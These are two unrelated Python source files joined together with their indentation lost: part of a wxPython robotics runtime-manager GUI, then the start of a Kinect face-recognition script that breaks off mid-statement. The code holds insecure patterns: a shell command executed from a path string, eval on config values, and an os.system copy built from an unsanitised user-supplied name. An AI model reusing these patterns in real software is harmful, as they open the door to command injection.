self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
szr.Add(self.lb, 0, flag, 4)
if self.kind == 'path':
v = str(v)
v = path_expand_cmd(v)
v = os.path.expandvars(os.path.expanduser(v))
style = wx.TE_PROCESS_ENTER + wx_flag_get( self.var.get('str_flags', []) )
self.tc = wx.TextCtrl(self, wx.ID_ANY, str(v), style=style)
self.Bind(wx.EVT_TEXT_ENTER, self.OnUpdate, self.tc)
if self.kind in ('num', None):
if self.has_slider:
self.w = self.max - self.min
vlst = [ v, self.min, self.max, self.var['v'] ]
self.is_float = len( [ v_ for v_ in vlst if type(v_) is not int ] ) > 0
self.int_max = 1000 if self.is_float else self.max
self.int_min = 0 if self.is_float else self.min
self.slider = wx.Slider(self, wx.ID_ANY, self.get_int_v(), self.int_min, self.int_max)
self.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll, self.slider)
self.slider.SetMinSize((82, 27))
szr.Add(self.slider, 1, wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, 4)
else:
self.is_float = type(self.var['v']) is not int
self.tc.SetMinSize((40,27))
flag = wx.ALIGN_CENTER_VERTICAL
prop = 1 if self.kind == 'path' or self.kind == 'str' else 0
szr.Add(self.tc, prop, flag, 4)
if self.kind == 'path':
self.ref = wx.Button(self, wx.ID_ANY, 'Ref')
self.Bind(wx.EVT_BUTTON, self.OnRef, self.ref)
button_color_hdr_setup(self.ref)
self.ref.SetMinSize((40,29))
szr.Add(self.ref, 0, flag, 4)
if self.has_slider or self.kind == 'num':
vszr = wx.BoxSizer(wx.VERTICAL)
vszr.Add( self.create_bmbtn("inc.png", self.OnIncBtn) )
vszr.Add( self.create_bmbtn("dec.png", self.OnDecBtn) )
szr.Add(vszr, 0, wx.ALIGN_CENTER_VERTICAL)
self.SetSizer(szr)
def setup_tooltip(self):
if get_tooltips(self.var):
set_tooltips(self.obj, self.var)
if get_tooltip(self.var):
obj = self.lb if self.lb else (self if self.kind == 'radio_box' else self.obj)
set_tooltip(obj, self.var)
def create_bmbtn(self, filename, hdr):
dir = rtmgr_src_dir()
bm = wx.Bitmap(dir + filename, wx.BITMAP_TYPE_ANY)
style = wx.BORDER_NONE | wx.BU_EXACTFIT
obj = wx.lib.buttons.GenBitmapButton(self, wx.ID_ANY, bm, style=style)
self.Bind(wx.EVT_BUTTON, hdr, obj)
return obj
def get_v(self):
if self.kind in [ 'radio_box', 'menu' ]:
return self.choices_sel_get()
if self.kind in [ 'checkbox', 'toggle_button' ]:
return self.obj.GetValue()
if self.kind == 'checkboxes':
return self.obj.get()
if self.kind == 'hide':
return self.var.get('v')
if self.kind in [ 'path', 'str' ]:
return str(self.tc.GetValue())
if not self.has_slider and self.tc.GetValue() == '':
return ''
return self.get_tc_v()
def get_tc_v(self):
s = self.tc.GetValue()
v = str_to_float(s) if self.is_float else int(s)
if self.has_slider:
v = self.min if v < self.min else v
v = self.max if v > self.max else v
self.tc.SetValue(adjust_num_str(str(v)))
return v
def get_int_v(self):
v = self.get_tc_v()
if self.is_float:
v = int( self.int_max * (v - self.min) / self.w if self.w != 0 else 0 )
return v
def OnScroll(self, event):
iv = self.slider.GetValue()
s = str(iv)
if self.is_float:
v = self.min + float(self.w) * iv / self.int_max
s = str(Decimal(v).quantize(Decimal(str(self.get_step()))))
self.tc.SetValue(s)
self.update(self.var)
def OnIncBtn(self, event):
step = self.get_step()
self.add_v(step)
def OnDecBtn(self, event):
step = self.get_step()
self.add_v(-step)
def get_step(self):
step = self.var.get('step')
return step if step else 0.01 if self.is_float else 1
def add_v(self, step):
ov = self.get_v()
self.tc.SetValue(str(ov + step))
v = self.get_v()
if v != ov:
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnUpdate(self, event):
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnRef(self, event):
if file_dialog(self, self.tc, self.var) == wx.ID_OK:
self.update(self.var)
def choices_sel_get(self):
return self.obj.GetStringSelection() if self.var.get('choices_type') == 'str' else self.obj.GetSelection()
def choices_sel_set(self, v):
if self.var.get('choices_type') == 'str':
self.obj.SetStringSelection(v)
else:
self.obj.SetSelection(v)
def is_nl(self):
return self.has_slider or self.kind in [ 'path' ]
class MyDialogParam(rtmgr.MyDialogParam):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogParam.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
ok_lb_key = 'open_dialog_ok_label'
if dic_list_get(gdic, 'dialog_type', 'config') == 'open' and ok_lb_key in gdic:
self.button_1.SetLabel( gdic.get(ok_lb_key) )
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogDPM(rtmgr.MyDialogDPM):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogDPM.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
parent = self.panel_v
frame = self.GetParent()
self.frame = frame
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnLink(self, event):
obj = event.GetEventObject()
dic = { self.hyperlink_car : self.frame.button_car_dpm,
self.hyperlink_pedestrian : self.frame.button_pedestrian_dpm }
obj = dic.get(obj)
if obj:
self.frame.OnHyperlinked_obj(obj)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogCarPedestrian(rtmgr.MyDialogCarPedestrian):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogCarPedestrian.__init__(self, *args, **kwds)
self.Bind(wx.EVT_CLOSE, self.OnClose)
frame = self.GetParent()
self.frame = frame
self.SetTitle(prm.get('name', ''))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnLink(self, event):
obj = event.GetEventObject()
car_ped = { self.hyperlink_car : 'car', self.hyperlink_pedestrian : 'pedestrian' }.get(obj, 'car')
obj_key = self.gdic.get('car_pedestrian_obj_key', {}).get(car_ped)
obj = getattr(self.frame, 'button_' + obj_key, None) if obj_key else None
if obj:
self.frame.OnHyperlinked_obj(obj)
self.EndModal(0)
def OnClose(self, event):
self.EndModal(-1)
class MyDialogLaneStop(rtmgr.MyDialogLaneStop):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogLaneStop.__init__(self, *args, **kwds)
self.frame = self.GetParent()
name = 'lane_stop'
var = next( ( var for var in self.prm.get('vars', []) if var.get('name') == name ), {} )
v = self.pdic.get( name, var.get('v', False) )
set_val(self.checkbox_lane_stop, v)
def update(self):
update_func = self.gdic.get('update_func')
if update_func:
update_func(self.pdic, self.gdic, self.prm)
def OnTrafficRedLight(self, event):
self.pdic['traffic_light'] = 0
self.update()
def OnTrafficGreenLight(self, event):
self.pdic['traffic_light'] = 1
self.update()
def OnTrafficLightRecognition(self, event):
pub = rospy.Publisher('/config/lane_stop', ConfigLaneStop, latch=True, queue_size=10)
msg = ConfigLaneStop()
v = event.GetEventObject().GetValue()
self.pdic['lane_stop'] = v
msg.manual_detection = not v
pub.publish(msg)
def OnOk(self, event):
self.EndModal(0)
def OnCancel(self, event):
self.EndModal(-1)
class InfoBarLabel(wx.BoxSizer):
def __init__(self, parent, btm_txt=None, lmt_bar_prg=90, bar_orient=wx.VERTICAL):
wx.BoxSizer.__init__(self, orient=wx.VERTICAL)
self.lb = wx.StaticText(parent, wx.ID_ANY, '')
self.bar = BarLabel(parent, hv=bar_orient, show_lb=False)
bt = wx.StaticText(parent, wx.ID_ANY, btm_txt) if btm_txt else None
self.Add(self.lb, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bar_orient == wx.VERTICAL:
sz = self.bar.GetSize()
sz.SetWidth(20)
self.bar.SetMinSize(sz)
self.Add(self.bar, 1, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bt:
self.Add(bt, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
else:
szr = wx.BoxSizer(wx.HORIZONTAL)
if bt:
szr.Add(bt, 0, 0, 0)
szr.Add(self.bar, 1, 0, 0)
self.Add(szr, 1, wx.EXPAND, 0)
self.lmt_bar_prg = lmt_bar_prg
def lb_set(self, txt, col):
self.lb.SetForegroundColour(col)
self.lb.SetLabel(txt);
self.Layout()
def bar_set(self, prg):
(col1, col2) = (wx.Colour(0,0,250), wx.Colour(0,0,128))
if prg >= self.lmt_bar_prg:
(col1, col2) = (wx.Colour(250,0,0), wx.Colour(128,0,0))
self.bar.set_col(col1, col2)
self.bar.set(prg)
class Checkboxes(wx.Panel):
def __init__(self, parent, item_n, lb):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.boxes = [ wx.CheckBox(self, wx.ID_ANY, lb + str(i)) for i in range(item_n) ]
vsz = wx.BoxSizer(wx.VERTICAL)
for j in range((item_n + 7) / 8):
hsz = wx.BoxSizer(wx.HORIZONTAL)
for i in range(8):
idx = j * 8 + i
if idx < len(self.boxes):
hsz.Add(self.boxes[idx], 0, wx.LEFT, 8)
vsz.Add(hsz)
self.SetSizer(vsz)
vsz.Fit(self)
def set(self, vs):
vs = vs if vs else [ True for box in self.boxes ]
for (box, v) in zip(self.boxes, vs):
box.SetValue(v)
def get(self):
return [ box.GetValue() for box in self.boxes ]
class BarLabel(wx.Panel):
def __init__(self, parent, txt='', pos=wx.DefaultPosition, size=wx.DefaultSize, style=0, hv=wx.HORIZONTAL, show_lb=True):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lb = wx.StaticText(self, wx.ID_ANY, '', style=style)
self.txt = txt
self.hv = hv
self.dir = wx.SOUTH if hv == wx.HORIZONTAL else wx.EAST
self.show_lb = show_lb
self.prg = -1
self.dflt_col1 = wx.Colour(250,250,250)
self.dflt_col2 = wx.Colour(128,128,128)
self.col1 = self.dflt_col1
self.col2 = self.dflt_col2
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, prg):
self.prg = prg
if self.show_lb:
self.lb.SetLabel(self.txt + str(prg) + '%' if prg >= 0 else '')
self.Refresh()
def set_col(self, col1, col2):
self.col1 = col1 if col1 != wx.NullColour else self.dflt_col1
self.col2 = col2 if col2 != wx.NullColour else self.dflt_col2
def clear(self):
self.set(-1)
def OnPaint(self, event):
dc = wx.PaintDC(self)
(w,h) = self.GetSize()
if self.IsEnabled():
p = (w if self.hv == wx.HORIZONTAL else h) * self.prg / 100
rect = wx.Rect(0, 0, p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, h-p, w, p)
dc.GradientFillLinear(rect, self.col1, self.col2, self.dir)
rect = wx.Rect(p, 0, w-p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, 0, w, h-p)
dc.GradientFillLinear(rect, wx.Colour(200,200,200), wx.Colour(220,220,220), self.dir)
else:
rect = wx.Rect(0, 0, w, h)
dc.GradientFillLinear(rect, wx.Colour(250,250,250), wx.Colour(250,250,250), self.dir)
class ColorLabel(wx.Panel):
def __init__(self, parent, lst=[], pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lst = lst
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, lst):
self.lst = lst
self.Refresh()
def OnPaint(self, event):
dc = wx.PaintDC(self)
dc.Clear()
#change_font_point_by_rate(dc, 0.75)
(x,y) = (0,0)
(_, h, _, _) = dc.GetFullTextExtent(' ')
for v in self.lst:
if type(v) is tuple and len(v) == 2:
(x,y) = v
elif type(v) is tuple and len(v) == 3:
dc.SetTextForeground(v)
elif v == '\n':
(x,y) = (0,y+h)
elif type(v) is str:
dc.DrawText(v, x, y)
(w, _, _, _) = dc.GetFullTextExtent(v)
x += w
class StrValObj:
def __init__(self, s, v):
self.s = s
self.v = v
def GetValue(self):
return self.v
def SetValue(self, v):
self.v = v
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
frame_1 = Final(None, wx.ID_ANY, "")
self.SetTopWindow(frame_1)
buttons_color_hdr_setup(frame_1)
frame_1.Show()
return 1
def file_dialog(parent, tc, path_inf_dic={}):
path = tc.GetValue()
path = get_top(path.split(','), path)
(dn, fn) = os.path.split(path)
path_type = path_inf_dic.get('path_type')
if path_type == 'dir':
fns = path_inf_dic.get('filenames')
if type(fns) is str and fns[-5:] == '.yaml':
fns = load_yaml(fns)
if type(fns) is not list:
fns = None
path_inf_dic['filenames'] = fns
dlg = wx.DirDialog(parent, defaultPath=path)
else:
st_dic = { 'save' : wx.FD_SAVE, 'multi' : wx.FD_MULTIPLE }
dlg = wx.FileDialog(parent, defaultDir=dn, defaultFile=fn,
style=st_dic.get(path_type, wx.FD_DEFAULT_STYLE))
ret = show_modal(dlg)
if ret == wx.ID_OK:
path = ','.join(dlg.GetPaths()) if path_type == 'multi' else dlg.GetPath()
if path_type == 'dir' and fns:
path = ','.join([ path + '/' + fn for fn in fns ])
set_path(tc, path)
dlg.Destroy()
return ret
def button_color_change(btn, v=None):
if v is None and type(btn) is wx.ToggleButton:
v = btn.GetValue()
key = ( v , btn.IsEnabled() )
dic = { (True,True):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0') }
(fcol, bcol) = dic.get(key, (wx.NullColour, wx.NullColour))
btn.SetForegroundColour(fcol)
btn.SetBackgroundColour(bcol)
def OnButtonColorHdr(event):
btn = event.GetEventObject()
dic = { wx.EVT_TOGGLEBUTTON.typeId : None,
wx.EVT_LEFT_DOWN.typeId : True,
wx.EVT_LEFT_UP.typeId : False }
v = dic.get(event.GetEventType(), '?')
if v != '?':
button_color_change(btn, v)
event.Skip()
btn_null_bgcol = None
def is_btn_null_bgcol(btn):
global btn_null_bgcol
bak = btn.GetBackgroundColour()
if btn_null_bgcol is None:
btn.SetBackgroundColour(wx.NullColour)
btn_null_bgcol = btn.GetBackgroundColour()
if bak != btn_null_bgcol:
btn.SetBackgroundColour(bak)
return bak == btn_null_bgcol
def button_color_hdr_setup(btn):
hdr = OnButtonColorHdr
if type(btn) is wx.ToggleButton:
btn.Bind(wx.EVT_TOGGLEBUTTON, hdr)
elif type(btn) is wx.Button and is_btn_null_bgcol(btn):
btn.Bind(wx.EVT_LEFT_DOWN, hdr)
btn.Bind(wx.EVT_LEFT_UP, hdr)
def buttons_color_hdr_setup(frm_obj):
key = 'button_'
btns = [ getattr(frm_obj, nm) for nm in dir(frm_obj) if nm[:len(key)] == key ]
for btn in btns:
button_color_hdr_setup(btn)
def show_modal(dlg):
buttons_color_hdr_setup(dlg)
return dlg.ShowModal()
def load_yaml(filename, def_ret=None):
dir = rtmgr_src_dir()
path = dir + filename
if not os.path.isfile(path):
return def_ret
print('loading ' + filename)
f = open(dir + filename, 'r')
d = yaml.load(f)
f.close()
return d
def terminate_children(proc, sigint=False):
for child in psutil.Process(proc.pid).get_children():
terminate_children(child, sigint)
terminate(child, sigint)
def terminate(proc, sigint=False):
if sigint:
proc.send_signal(signal.SIGINT)
else:
proc.terminate()
def th_start(target, kwargs={}):
ev = threading.Event()
kwargs['ev'] = ev
th = threading.Thread(target=target, kwargs=kwargs)
th.daemon = True
th.start()
return (th, ev)
def th_end((th, ev)):
ev.set()
th.join()
def que_clear(que):
with que.mutex:
que.queue.clear()
def append_tc_limit(tc, s, rm_chars=0):
if rm_chars > 0:
tc.Remove(0, rm_chars)
tc.AppendText(s)
def cut_esc(s):
while True:
i = s.find(chr(27))
if i < 0:
break
j = s.find('m', i)
if j < 0:
break
s = s[:i] + s[j+1:]
return s
def change_font_point_by_rate(obj, rate=1.0):
font = obj.GetFont()
pt = font.GetPointSize()
pt = int(pt * rate)
font.SetPointSize(pt)
obj.SetFont(font)
def fix_link_color(obj):
t = type(obj)
if t is CT.GenericTreeItem or t is CT.CustomTreeCtrl:
obj.SetHyperTextVisitedColour(obj.GetHyperTextNewColour())
elif t is wx.HyperlinkCtrl:
obj.SetVisitedColour(obj.GetNormalColour())
def get_tooltip(dic):
return dic.get('desc')
def get_tooltips(dic):
return dic.get('descs', [])
def set_tooltip(obj, dic):
set_tooltip_str(obj, get_tooltip(dic))
def set_tooltip_str(obj, s):
if s and getattr(obj, 'SetToolTipString', None):
obj.SetToolTipString(s)
def set_tooltips(obj, dic):
lst = get_tooltips(dic)
if lst and getattr(obj, 'SetItemToolTip', None):
for (ix, s) in enumerate(lst):
obj.SetItemToolTip(ix, s)
def get_tooltip_obj(obj):
if getattr(obj, 'GetToolTip', None):
t = obj.GetToolTip()
return t.GetTip() if t else None
return None
def scaled_bitmap(bm, scale):
(w, h) = bm.GetSize()
img = wx.ImageFromBitmap(bm)
img = img.Scale(w * scale, h * scale, wx.IMAGE_QUALITY_HIGH)
return wx.BitmapFromImage(img)
def sizer_wrap(add_objs, orient=wx.VERTICAL, prop=0, flag=0, border=0, parent=None):
szr = wx.BoxSizer(orient)
for obj in add_objs:
szr.Add(obj, prop, flag, border)
if parent:
parent.SetSizer(szr)
return szr
def static_box_sizer(parent, s, orient=wx.VERTICAL):
sb = wx.StaticBox(parent, wx.ID_ANY, s)
sb.Lower()
return wx.StaticBoxSizer(sb, orient)
def wx_flag_get(flags):
dic = { 'top' : wx.TOP, 'bottom' : wx.BOTTOM, 'left' : wx.LEFT, 'right' : wx.RIGHT,
'all' : wx.ALL, 'expand' : wx.EXPAND, 'fixed_minsize' : wx.FIXED_MINSIZE,
'center_v' : wx.ALIGN_CENTER_VERTICAL, 'center_h' : wx.ALIGN_CENTER_HORIZONTAL,
'passwd' : wx.TE_PASSWORD }
lst = [ dic.get(f) for f in flags if f in dic ]
return reduce(lambda a,b : a+b, [0] + lst)
def msg_path_to_obj_attr(msg, path):
lst = path.split('.')
obj = msg
for attr in lst[:-1]:
obj = getattr(obj, attr, None)
return (obj, lst[-1])
def str_to_rosval(s, type_str, def_ret=None):
cvt_dic = {
'int8':int , 'int16':int , 'int32':int ,
'uint8':int , 'uint16':int , 'uint32':int ,
'int64':long , 'uint64':long,
'float32':float, 'float64':float,
}
t = cvt_dic.get(type_str)
s = s.replace(',','.') if t is float and type(s) is str else s
return t(s) if t else def_ret
def str_to_float(s):
return float( s.replace(',','.') )
def set_path(tc, v):
tc.SetValue(v)
tc.SetInsertionPointEnd()
def set_val(obj, v):
func = getattr(obj, 'SetValue', getattr(obj, 'Check', None))
if func:
func(v)
obj_refresh(obj)
if type(obj) is wx.ToggleButton:
button_color_change(obj)
def enables_set(obj, k, en):
d = attr_getset(obj, 'enabLes', {})
d[k] = en
d['last_key'] = k
obj.Enable( all( d.values() ) )
if isinstance(obj, wx.HyperlinkCtrl):
if not hasattr(obj, 'coLor'):
obj.coLor = { True:obj.GetNormalColour(), False:'#808080' }
c = obj.coLor.get(obj.IsEnabled())
obj.SetNormalColour(c)
obj.SetVisitedColour(c)
def enables_get(obj, k, def_ret=None):
return attr_getset(obj, 'enabLes', {}).get(k, def_ret)
def enables_get_last(obj):
k = enables_get(obj, 'last_key')
return (k, enables_get(obj, k))
def obj_refresh(obj):
if type(obj) is CT.GenericTreeItem:
while obj.GetParent():
obj = obj.GetParent()
tree = obj.GetData()
tree.Refresh()
# dic_list util (push, pop, get)
def dic_list_push(dic, key, v):
dic_getset(dic, key, []).append(v)
def dic_list_pop(dic, key):
dic.get(key, [None]).pop()
def dic_list_get(dic, key, def_ret=None):
return dic.get(key, [def_ret])[-1]
def bak_stk_push(dic, key):
if key in dic:
k = key + '_bak_str'
dic_getset(dic, k, []).append( dic.get(key) )
def bak_stk_pop(dic, key):
k = key + '_bak_str'
stk = dic.get(k, [])
if len(stk) > 0:
dic[key] = stk.pop()
else:
del dic[key]
def bak_stk_set(dic, key, v):
bak_str_push(dic, key)
dic[key] = v
def attr_getset(obj, name, def_ret):
if not hasattr(obj, name):
setattr(obj, name, def_ret)
return getattr(obj, name)
def dic_getset(dic, key, def_ret):
if key not in dic:
dic[key] = def_ret
return dic.get(key)
def lst_append_once(lst, v):
exist = v in lst
if not exist:
lst.append(v)
return exist
def lst_remove_once(lst, v):
exist = v in lst
if exist:
lst.remove(v)
return exist
def get_top(lst, def_ret=None):
return lst[0] if len(lst) > 0 else def_ret
def adjust_num_str(s):
if '.' in s:
while s[-1] == '0':
s = s[:-1]
if s[-1] == '.':
s = s[:-1]
return s
def rtmgr_src_dir():
return os.path.abspath(os.path.dirname(__file__)) + "/"
def path_expand_cmd(path):
lst = path.split('/')
s = lst[0]
if s[:2] == '$(' and s[-1] == ')':
cmd = s[2:-1].split(' ')
lst[0] = subprocess.check_output(cmd).strip()
path = '/'.join(lst)
return path
def eval_if_str(self, v):
return eval(v) if type(v) is str else v
def dic_eval_if_str(self, dic, key, def_ret=None):
return eval_if_str( self, dic.get(key, def_ret) )
def prn_dict(dic):
for (k,v) in dic.items():
print (k, ':', v)
def send_to_proc_manager(order):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(PROC_MANAGER_SOCK)
except socket.error:
print('Failed connect to {}'.format(PROC_MANAGER_SOCK))
return -1
sock.send(yaml.dump(order))
ret = sock.recv(1024)
sock.close()
return int(ret) == 0
def set_process_nice(proc, value):
order = {
"name": "nice",
"pid": proc.pid,
"nice": value
}
return send_to_proc_manager(order)
def set_process_cpu_affinity(proc, cpus):
order = {
"name": "cpu_affinity",
"pid": proc.pid,
"cpus": cpus,
}
return send_to_proc_manager(order)
def shutdown_proc_manager():
order = {
"name": "shutdown",
}
return send_to_proc_manager(order)
def set_scheduling_policy(proc, policy, priority):
order = {
"name": "scheduling_policy",
"pid": proc.pid,
"policy": policy,
"priority": priority,
}
return send_to_proc_manager(order)
def get_cpu_count():
try:
return psutil.NUM_CPUS
except AttributeError:
return psutil.cpu_count()
class DetailDialog(wx.Dialog):
def __init__(self, parent):
wx.Dialog.__init__(self, parent, title="modal window", size=(370, 260))
panel = wx.Panel(self, wx.ID_ANY)
layout = wx.BoxSizer(wx.VERTICAL)
self.filename = os.getcwd() + "/src/util/packages/data_preprocessor/scripts/32db.yaml"
self.tc2 = wx.TextCtrl(panel, wx.ID_ANY, self.filename, style=1024)
self.tc2.SetMinSize((300, 29))
self.Bind(wx.EVT_TEXT_ENTER, self.update_path, self.tc2)
ref = wx.Button(panel, wx.ID_ANY, 'Ref')
self.Bind(wx.EVT_BUTTON, self.open_dialog, ref)
ref.SetMinSize((40,29))
self.dir = ""
sb = wx.StaticBox(panel, wx.ID_ANY, "Spam, spam, spam")
sb.SetLabel("Lidar's Calibration File")
layout1 = wx.StaticBoxSizer(sb, wx.HORIZONTAL)
layout1.Add(self.tc2, 0, wx.ALL, 4)
layout1.Add(ref, 0, wx.ALL, 4)
layout.Add(layout1)
button = wx.Button(panel, wx.ID_ANY, "OK")
button2 = wx.Button(panel, wx.ID_ANY, "Cancel")
ch1 = wx.CheckBox(panel, wx.ID_ANY, "Velodyne HDL-64e-S2")
ch2 = wx.CheckBox(panel, wx.ID_ANY, "Velodyne HDL-64e-S3")
ch3 = wx.CheckBox(panel, wx.ID_ANY, "Velodyne HDL-32e")
ch4 = wx.CheckBox(panel, wx.ID_ANY, "Velodyne VLP-16")
ch5 = wx.CheckBox(panel, wx.ID_ANY, "Hokuyo TOP-URG")
ch6 = wx.CheckBox(panel, wx.ID_ANY, "Hokuyo 3D-URG")
self.select = ""
self.parent = parent
self.values = {ch1:1, ch2:2, ch3:3, ch4:4, ch5:5, ch6:6}
if self.parent.select:
for key, val in self.values.items():
if val == self.parent.select:
key.SetValue(1)
break
ch1.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch2.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch3.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch4.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch5.Bind(wx.EVT_CHECKBOX, self.oncheck)
ch6.Bind(wx.EVT_CHECKBOX, self.oncheck)
button.Bind(wx.EVT_BUTTON, self.button_close_OK)
button2.Bind(wx.EVT_BUTTON, self.button_close_Cancel)
sb2 = wx.StaticBox(panel, wx.ID_ANY, "Spam, spam, spam", size=(370, 150))
sb2.SetLabel("Lidar's Calibration File")
layout2 = wx.StaticBoxSizer(sb2, wx.VERTICAL)
layout2.Add(ch1)
layout2.Add(ch2)
layout2.Add(ch3)
layout2.Add(ch4)
layout2.Add(ch5)
layout2.Add(ch6)
layout.Add(layout2)
layout3 = wx.BoxSizer(wx.HORIZONTAL)
layout3.AddStretchSpacer()
layout3.Add(button, 0, wx.ALL | wx.CENTER | wx.EXPAND, 4)
layout3.Add(button2, 0, wx.ALL | wx.CENTER | wx.EXPAND, 4)
layout3.AddStretchSpacer()
layout.Add(layout3, 0, wx.ALIGN_CENTER, 0)
panel.SetSizer(layout)
def update_path(self, a):
self.filename = self.tc2.GetValue()
def open_dialog(self, ref):
dlg = wx.FileDialog(self, defaultDir=self.dir, defaultFile=self.filename)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetDirectory() + "/" + dlg.GetFilename()
self.tc2.SetValue(self.filename)
dlg.Destroy()
def oncheck(self, event):
push = event.GetEventObject()
if push.GetValue():
for value in self.values.keys():
if value == push:
self.select = self.values[push]
else:
value.SetValue(0)
else:
push.SetValue(0)
self.select = 0
def button_close_OK(self, event):
try:
self.parent.file_path = self.tc2.GetValue()
self.parent.select = self.select
self.Close()
finally:
self.Destroy()
def button_close_Cancel(self, event):
try:
self.parent.select = 0
self.Close()
finally:
return True
if __name__ == "__main__":
gettext.install("app")
app = MyApp(0)
app.MainLoop()
|
face_reco.py
|
import face_recognition
import cv2
import kinect
import img_file_parser
import voice2text
import threading
import mc_face
import os
import tts
import db_wrapper
# Get a reference to webcam #0 (the default one)
class face_reco():
def __init__(self):
self.video_capture = cv2.VideoCapture(0)
self.db = db_wrapper.db_wrapper()
def reco(self):
temp = img_file_parser.img_parser()
name_list = temp[0]
# print(name_list)
face_encoding_list = temp[1]
age_list = temp[2]
gender_list = temp[3]
glass_list = temp[4]
# Initialize some variables
process_this_frame = True
detected = False
face_locations = []
face_encodings = []
face_names = []
while True:
# Grab a single frame of video
# ret, frame = self.video_capture.read() # Local camera
frame = kinect.get_video() # Kinect Camera
frame = cv2.resize(frame, (640, 480))
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Only process every other frame of video to save time
if process_this_frame:
face_locations = []
face_encodings = []
face_names = []
face_ages = []
face_gender = []
face_glasses = []
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(small_frame)
face_encodings = face_recognition.face_encodings(small_frame, face_locations)
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
match = face_recognition.compare_faces(face_encoding_list, face_encoding, tolerance=0.5)
name = "Unknown"
age = "unknown"
gender = "unknown"
glass = "unknown"
try:
matchingFace = match.index(True)
except ValueError:
matchingFace = -1
faceLength = len(match)
if matchingFace == -1:
if detected:
print("New face found, please say your name for the record\n")
tts.tts("New face found, Say your name!")
#
# largeNewName = voice2text()
# t = voice2text()
# x = threading.Thread(target=t.v2t)
# x.start()
largeNewName = ""
t = voice2text.voice2text()
try:
largeNewName = t.v2t()
except:
tts.tts("Timeout")
largeNewName = "x"
largeNewName = raw_input("Input your name: ")
# largeNewName = "Michael"
detected = False
if not largeNewName == "X" and not largeNewName == "x":
name_list.append(largeNewName)
face_encoding_list.append(face_encoding)
indi = face_encodings.index(face_encoding)
(top, right, bottom, left) = face_locations[indi]
roi = frame[int(top * 4 * 0.7): min(int(bottom * 4 * 1.4) , 480), int(left *4 * 0.7):min(int(right*4*1.4), 640)]
# print(type(roi))
ct = self.db.name_count(largeNewName)
cv2.imwrite(largeNewName + str(ct + 1) + ".jpg", roi)
os.system("cp \"" + largeNewName + str(ct + 1) + ".jpg\"" + " ../HackGT/yilun/static/Portrait/")
temp_specs = mc_face.analyse(largeNewName +str(ct + 1)+ ".jpg")
if not len(temp_specs) == 0:
age_list.append(temp_specs[0])
gender_list.append(temp_specs[1])
glass_list.append(temp_specs[2])
try:
self.db.add_person_full(largeNewName, largeNewName + str(ct + 1), temp_specs[0],
temp_specs[1] == "Male", temp_specs[2] == "ReaderGlasses")
except:
pass
else:
age_list.append(99)
gender_list.append("UNKNOWN")
glass_list.append("UNKNOWN")
try:
